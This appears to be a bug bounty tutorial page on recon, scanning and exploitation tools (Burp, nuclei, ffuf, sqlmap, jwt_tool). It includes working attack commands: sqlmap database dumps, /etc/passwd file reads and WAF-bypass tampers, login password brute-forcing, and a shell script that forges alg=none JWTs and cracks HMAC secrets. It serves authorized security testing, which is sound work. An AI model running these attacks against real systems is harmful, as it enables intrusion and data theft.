Tooling: the bug bounty hunter's arsenal
Burp Suite, Nuclei, httpx, subfinder, ffuf, Amass, sqlmap and the full tool stack for offensive security and bug bounty.
Tools don't make the hunter, but a hunter without tools is inefficient. This page covers the essential stack, when to use each tool, and how to configure each one for maximum throughput.
Stack by Category
┌─────────────────────────────────────────────────────────┐
│                    BUG BOUNTY TOOLKIT                   │
├───────────┬────────────┬────────────┬───────────────────┤
│ Recon     │ Scanning   │ Exploit    │ Auxiliary         │
├───────────┼────────────┼────────────┼───────────────────┤
│ subfinder │ nuclei     │ burp suite │ Interactsh        │
│ amass     │ nikto      │ sqlmap     │ ngrok             │
│ httpx     │ nmap       │ ffuf       │ notify            │
│ dnsx      │ naabu      │ commix     │ tmux              │
│ katana    │ testssl    │ xsstrike   │ Obsidian/Notion   │
│ gau       │            │ jwt_tool   │ Git               │
│ wayback   │            │ arjun      │ pentest-wiki      │
│ shodan    │            │            │                   │
└───────────┴────────────┴────────────┴───────────────────┘
Burp Suite Pro
Burp Suite is the central tool for any hunter. The Pro edition (listed here at $449/year) is worth the money: the automated Scanner is Pro-only and the Community edition throttles Intruder.
Essential configuration
1. Proxy → Proxy settings → Proxy listeners: bind to 127.0.0.1:8080 (the default; move it if something else already owns 8080)
2. Settings → Network → Connections → Upstream proxy servers (older builds: Project options → Connections) if you tunnel through a VPN or SOCKS proxy
3. Scanner: choose a fast crawl-and-audit configuration for bug bounty, and keep it inside the program's rate limits
4. Intruder → resource pool (older builds: Options → Number of threads): 10-50 concurrent requests
5. Extensions → BApp Store (older builds: Extender) → install:
- Autorize (authorization testing: replays your requests with a low-privilege session)
- JWT Editor (JWT manipulation and signing)
- Hackvertor (encoding/decoding with tags inside requests)
- Logger++ (advanced request/response logging)
- Flow (request visualization)
- Param Miner (hidden parameter and header discovery)
- JS Link Finder (extract URLs from JavaScript)
- Software Vulnerability Scanner (matches detected software versions against known CVEs)
Burp Suite workflow
1. Browser → Burp Proxy (intercept traffic)
2. Crawl (Target → Site map; Spider in older versions) → map the application
3. Repeater → test endpoints by hand
4. Intruder → parameter fuzzing
5. Scanner → automated scan (Pro only)
6. Decoder → encoding/decoding
7. Comparer → diff responses
8. Sequencer → token randomness analysis
Intruder payloads
# Sniper: one payload set; each position is fuzzed in turn while the others keep their original value
# Battering ram: one payload set; the same payload is placed in every position at once
# Pitchfork: one payload set per position, advanced in lockstep (line n of every list together, e.g. username/password pairs)
# Cluster bomb: one payload set per position, every combination (Cartesian product, so the request count multiplies)
ProjectDiscovery Suite
ProjectDiscovery maintains the most widely used open-source bug bounty tooling. The tools below share flag conventions (-l for list input, -silent, -o for output) and are designed to pipe into one another.
subfinder
# Install
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
# Passive enumeration using every source (the paid ones need API keys)
subfinder -d target.com -all -o subs.txt
# Specific sources only (the flag is -s / -sources; there is no -provider flag)
subfinder -d target.com -s shodan,virustotal,securitytrails -o subs.txt
# Recursive (subdomains of subdomains; only sources that support recursion are used)
subfinder -d target.com -recursive -o subs.txt
# API keys live in ~/.config/subfinder/provider-config.yaml, one list of keys per source:
# shodan:
#   - xxx
httpx
# Install
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
# Basic HTTP probing (which hosts answer on 80/443)
cat subs.txt | httpx -silent -o alive.txt
# With details
cat subs.txt | httpx -silent -status-code -title -content-length -tech-detect -o details.txt
# Filters
cat subs.txt | httpx -silent -mc 200,301    # match status codes
cat subs.txt | httpx -silent -ml 500        # match an exact content length (there is no minimum-length filter; -fl drops a length)
cat subs.txt | httpx -silent -fc 404,403    # filter out status codes
# Screenshots (headless browser; files are stored under the output directory, ./output by default, see -srd)
cat subs.txt | httpx -silent -screenshot
# Technology detection (-td is the short form of -tech-detect)
cat subs.txt | httpx -silent -td
nuclei
# Install
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Basic scan
nuclei -u https://target.com
# Scan a list
nuclei -l alive.txt -o nuclei_results.txt
# By severity
nuclei -u https://target.com -severity critical,high
# By tags
nuclei -u https://target.com -tags cve,xss,sqli,ssrf
# Custom templates
nuclei -u https://target.com -t /custom-templates/
# Update templates
nuclei -update-templates
# Rate limit (requests per second) and bulk size (hosts scanned in parallel); check the program's rate-limit policy first
nuclei -l alive.txt -rate-limit 150 -bulk-size 25
# Machine-readable output (the v3 flag is -jsonl; v2 used -json)
nuclei -l alive.txt -jsonl -o nuclei.jsonl
Nuclei custom template
# custom-template.yaml
id: custom-sqli-detection

info:
  name: SQL Injection Detection (error-based)
  author: hunter
  severity: critical
  description: Detect SQL error messages leaking through the search parameter
  tags: sqli,injection

http:
  - method: GET
    path:
      - "{{BaseURL}}/search?q=1%27%20OR%20%271%27%3D%271"

    # Both matchers must hit: an error keyword AND a plausible status code.
    # The word list is case-sensitive and "SQL" alone is a weak signal, so
    # always confirm a hit by hand in Repeater before reporting.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SQL"
          - "syntax"
          - "mysql"
          - "ORA-"
        condition: or

      - type: status
        status:
          - 200
          - 500
dnsx
# Resolve (keep only names that actually have a record)
cat subs.txt | dnsx -silent -o resolved.txt
# Specific record types
cat subs.txt | dnsx -silent -a -aaaa -cname -mx -txt -o dns_records.txt
# Wildcard filtering (-wd): drop names that only resolve because *.target.com does
cat subs.txt | dnsx -wd target.com
naabu (port scanner)
# Install
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
# Quick port scan
naabu -host target.com -top-ports 1000
# Full port scan
naabu -host target.com -p -
# Scan a list
naabu -list subs.txt -o ports.txt
# Service detection: naabu has no -sV of its own, it hands the open ports to nmap
naabu -host target.com -nmap-cli 'nmap -sV'
katana (crawler)
# Install
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
# Basic crawl
katana -u https://target.com -o urls.txt
# Depth and scope (-cs takes a regex; the default field scope already keeps the crawl on the root domain)
katana -u https://target.com -d 3 -cs 'target\.com' -o urls.txt
# JavaScript crawling (parse endpoints out of JS files)
katana -u https://target.com -jc -o js_urls.txt
Fuzzing tools
ffuf
# Install
go install -v github.com/ffuf/ffuf/v2@latest
# Directory fuzzing
ffuf -u https://target.com/FUZZ -w /wordlists/common.txt -mc 200,301,302,403
# With filters. A comment after a trailing backslash breaks the command, so they go here:
# -fs 0 drops empty responses, -fw 100 drops the generic error page that has 100 words
# (-ac auto-calibrates these filters from a few junk requests if you would rather not measure by hand)
ffuf -u https://target.com/FUZZ -w /wordlists/common.txt \
  -mc 200,301,302 \
  -fs 0 \
  -fw 100 \
  -o results.json -of json
# Parameter fuzzing
ffuf -u "https://target.com/page?FUZZ=test" -w /wordlists/params.txt
# POST fuzzing (match on the 302 a successful login returns; check the program's rules before brute-forcing logins)
ffuf -u https://target.com/login \
  -X POST \
  -d "username=admin&password=FUZZ" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -w /wordlists/passwords.txt \
  -mc 302
# Vhost fuzzing (the wordlist goes into the Host header; many servers answer 200 to any Host, so add -fs with the default page size)
ffuf -u https://target.com -H "Host: FUZZ.target.com" -w /wordlists/subs.txt -mc 200
# Recursive fuzzing
ffuf -u https://target.com/FUZZ -w /wordlists/common.txt -recursion -recursion-depth 2
feroxbuster
# Install: see https://github.com/epi052/feroxbuster (recursive scanning is built in)
feroxbuster -u https://target.com -w /wordlists/common.txt -d 2 -o ferox.txt
# With extensions
feroxbuster -u https://target.com -w /wordlists/common.txt -x php,bak,old,zip
# With filters
feroxbuster -u https://target.com -w /wordlists/common.txt \
  --filter-status 404,403 \
  --filter-size 0
Exploitation tools
sqlmap
# Basic detection (--batch accepts the defaults instead of prompting)
sqlmap -u "https://target.com/page?id=1" --batch
# POST request, testing only the user parameter
sqlmap -u "https://target.com/login" \
  --data="user=admin&pass=test" \
  -p user \
  --batch
# With a session cookie
sqlmap -u "https://target.com/page?id=1" \
  --cookie="session=abc123" \
  --batch
# Dump the database (on a bounty target stop at proof of access; dump only what the program allows)
sqlmap -u "https://target.com/page?id=1" \
  --dump --batch
# Read a file from the server (needs FILE privilege or the DBMS equivalent)
sqlmap -u "https://target.com/page?id=1" \
  --file-read="/etc/passwd" \
  --batch
# Tamper scripts (WAF bypass)
sqlmap -u "https://target.com/page?id=1" \
  --tamper=space2comment,between,randomcase \
  --batch
# Level and risk (higher means more payloads; risk 3 adds OR-based tests that can modify data when the injection sits in an UPDATE or DELETE)
sqlmap -u "https://target.com/page?id=1" \
  --level=5 --risk=3 \
  --batch
jwt_tool
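Before the tool itself, here is what its alg=none, sign and crack modes do, written out in plain shell. This is an added example, not jwt_tool's code; it assumes only openssl, sed and tr on PATH. The `{"sub":"admin"}` payload and the `secret` key are constructed sample inputs.

```shell
#!/usr/bin/env bash
# Added example: the JWT primitives behind jwt_tool's -X a, -S hs256 and -C modes.
# Assumes openssl on PATH; not part of jwt_tool.
set -eu

# base64url without padding, as JWT segments use it (RFC 7515 section 2).
b64url_enc() { openssl base64 -A | tr -d '\n=' | tr -- '+/' '-_'; }

# Reverse: restore '+' '/' and the padding openssl wants, then decode.
b64url_dec() {
  s=$(cat)
  s=$(printf '%s' "$s" | tr -- '-_' '+/')
  case $(( ${#s} % 4 )) in
    2) s="$s==" ;;
    3) s="$s=" ;;
  esac
  printf '%s' "$s" | openssl base64 -d -A
}

jwt_header()  { printf '%s' "${1%%.*}" | b64url_dec; }
jwt_payload() { rest=${1#*.}; printf '%s' "${rest%%.*}" | b64url_dec; }

# alg=none: header says "none" and the signature segment is left empty. A server
# that still accepts this trusts whatever claims the client wrote.
jwt_forge_none() {  # $1 = payload JSON
  h=$(printf '%s' '{"alg":"none","typ":"JWT"}' | b64url_enc)
  printf '%s.%s.' "$h" "$(printf '%s' "$1" | b64url_enc)"
}

# HS256 is HMAC-SHA256 over "header.payload" with the shared secret.
jwt_sign_hs256() {  # $1 = payload JSON, $2 = secret
  h=$(printf '%s' '{"alg":"HS256","typ":"JWT"}' | b64url_enc)
  p=$(printf '%s' "$1" | b64url_enc)
  sig=$(printf '%s.%s' "$h" "$p" | openssl dgst -sha256 -hmac "$2" -binary | b64url_enc)
  printf '%s.%s.%s' "$h" "$p" "$sig"
}

# Exit 0 when the token's signature matches the secret; this is the check a cracker repeats.
jwt_verify_hs256() {  # $1 = token, $2 = secret
  signing=${1%.*}
  expect=$(printf '%s' "$signing" | openssl dgst -sha256 -hmac "$2" -binary | b64url_enc)
  [ "${1##*.}" = "$expect" ]
}

# Offline brute force: one candidate secret per line on stdin, prints the first hit.
jwt_crack_hs256() {  # $1 = token
  while IFS= read -r cand; do
    if jwt_verify_hs256 "$1" "$cand"; then printf '%s\n' "$cand"; return 0; fi
  done
  return 1
}

# Usage with constructed sample data:
#   tok=$(jwt_sign_hs256 '{"sub":"admin"}' 'secret')
#   jwt_payload "$tok"; jwt_forge_none '{"sub":"admin"}'
#   printf 'password\n123456\nsecret\n' | jwt_crack_hs256 "$tok"
```

Cracking is entirely offline, which is why a short HMAC secret is a finding on its own: once `jwt_crack_hs256` (or jwt_tool -C) recovers it, `jwt_sign_hs256` mints a valid token for any claims.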
# Install (there is no PyPI package; clone the repository)
git clone https://github.com/ticarpi/jwt_tool
pip3 install -r jwt_tool/requirements.txt
# Decode
python3 jwt_tool.py TOKEN
# Test the "none" algorithm
python3 jwt_tool.py -X a TOKEN
# Brute-force the HMAC secret (offline)
python3 jwt_tool.py -C -d /wordlists/rockyou.txt TOKEN
# Forge: inject sub=admin and re-sign with HS256 and a known secret
python3 jwt_tool.py -S hs256 -p "secret" -I -pc sub -pv admin TOKEN
Monitoring and Notifications
notify (ProjectDiscovery)
# Install
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
# Configure (~/.config/notify/provider-config.yaml)
discord:
  - id: "bug-bounty"
    discord_webhook_url: "https://discord.com/api/webhooks/xxx"
    discord_username: "Bug Bounty Bot"
telegram:
  - id: "bug-bounty"
    telegram_api_key: "xxx"
    telegram_chat_id: "xxx"
# Usage (-bulk sends all findings in one message instead of one message per line)
nuclei -l alive.txt -severity critical,high -silent | notify -bulk
# Automated pipeline
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical -silent | notify
Development Environment
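A one-liner pipeline like the one above is fine for a single root domain, but it scans whatever subfinder returns. The script below (the `recon.sh` that the `recon` alias further down points at) is an added example, not ProjectDiscovery code: it normalizes hosts from any source, enforces scope so that lookalikes such as `nottarget.com` or `target.com.evil.net` never reach nuclei, and only then runs the network tools. It assumes the ProjectDiscovery binaries are on PATH and notify is already configured; the hosts in the usage comment are constructed.

```shell
#!/usr/bin/env bash
# recon.sh: scope-aware wrapper around subfinder | dnsx | httpx | nuclei | notify.
# Added example, not ProjectDiscovery's code. Assumes the PD binaries are on PATH.
set -eu

# Normalize candidate hosts from any source (subfinder, amass, gau, manual lists):
# lowercase, strip scheme/path/port and a leading "*.", drop blanks and duplicates.
normalize_hosts() {
  tr '[:upper:]' '[:lower:]' \
    | sed -E 's#^[a-z]+://##; s#/.*$##; s#:[0-9]+$##; s#^\*\.##; /^$/d' \
    | sort -u
}

# Keep only hosts that equal an in-scope root or sit strictly under one.
# $1 is a whitespace-separated list of roots, e.g. "target.com target.io".
# The comparison includes the leading dot on purpose: a plain suffix check
# would let "nottarget.com" through, and no check would let "target.com.evil.net" through.
in_scope() {
  awk -v roots_str="$1" '
    BEGIN { n = split(roots_str, r, "[ \t\n]+") }
    {
      h = $0
      for (i = 1; i <= n; i++) {
        if (r[i] == "") continue
        if (h == r[i] || substr(h, length(h) - length(r[i])) == "." r[i]) { print h; next }
      }
    }'
}

# Full pipeline. $1 = file with one root domain per line, $2 = output directory.
run_recon() {
  roots_file=$1; out=$2
  roots=$(cat "$roots_file")
  mkdir -p "$out"
  for root in $roots; do
    subfinder -d "$root" -all -silent
  done | normalize_hosts | in_scope "$roots" > "$out/subs.txt"
  dnsx -silent -l "$out/subs.txt" -o "$out/resolved.txt"
  httpx -silent -l "$out/resolved.txt" -o "$out/alive.txt"
  httpx -silent -l "$out/alive.txt" -status-code -title -td -o "$out/details.txt"
  # Conservative rate limit; raise it only when the program's policy allows.
  nuclei -silent -l "$out/alive.txt" -severity critical,high -rate-limit 50 \
    -o "$out/nuclei.txt" | notify -bulk
}

# The network pipeline only runs when invoked explicitly:
#   ./recon.sh run roots.txt out/
# Offline check of the scope filter with constructed hosts:
#   printf 'https://API.target.com:443/login\nnottarget.com\n' | normalize_hosts | in_scope 'target.com'
if [ "${1:-}" = run ]; then
  run_recon "$2" "$3"
fi
```

Keeping the scope check as its own function means the same filter can sit in front of amass, gau or wayback output as well, and a program's out-of-scope list can be turned into a second pass that removes matches before anything is probed.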
VM/Homelab setup
# Docker compose for a test lab
# docker-compose.yml
version: '3'
services:
  dvwa:
    image: vulnerables/web-dvwa
    ports:
      - "8000:80"      # not 8080: that port is Burp's proxy listener
  juice-shop:
    image: bkimminich/juice-shop
    ports:
      - "3000:3000"
  webgoat:
    image: webgoat/webgoat
    ports:
      - "8081:8080"
  sqli-labs:
    image: acgpiano/sqli-labs
    ports:
      - "9999:80"
Terminal setup
# tmux to manage several sessions
tmux new -s bugbounty
# Horizontal split: Ctrl+B "
# Vertical split: Ctrl+B %
# Move between panes: Ctrl+B + arrow keys
# Useful aliases
alias recon='~/scripts/recon.sh'
alias nuclei-quick='nuclei -severity critical,high'
alias httpx-quick='httpx -silent -status-code -title -tech-detect'
References
API Security: hacking REST and GraphQL APIs
OWASP API Top 10, BOLA, broken authentication in APIs, GraphQL introspection abuse, mass assignment, rate limiting: offensive security in modern APIs.
Cloud Security: AWS, GCP and Azure
Cloud misconfigurations, IAM abuse, S3 bucket exploitation, SSRF to the metadata endpoint, cloud enumeration: offensive security in AWS, GCP and Azure environments.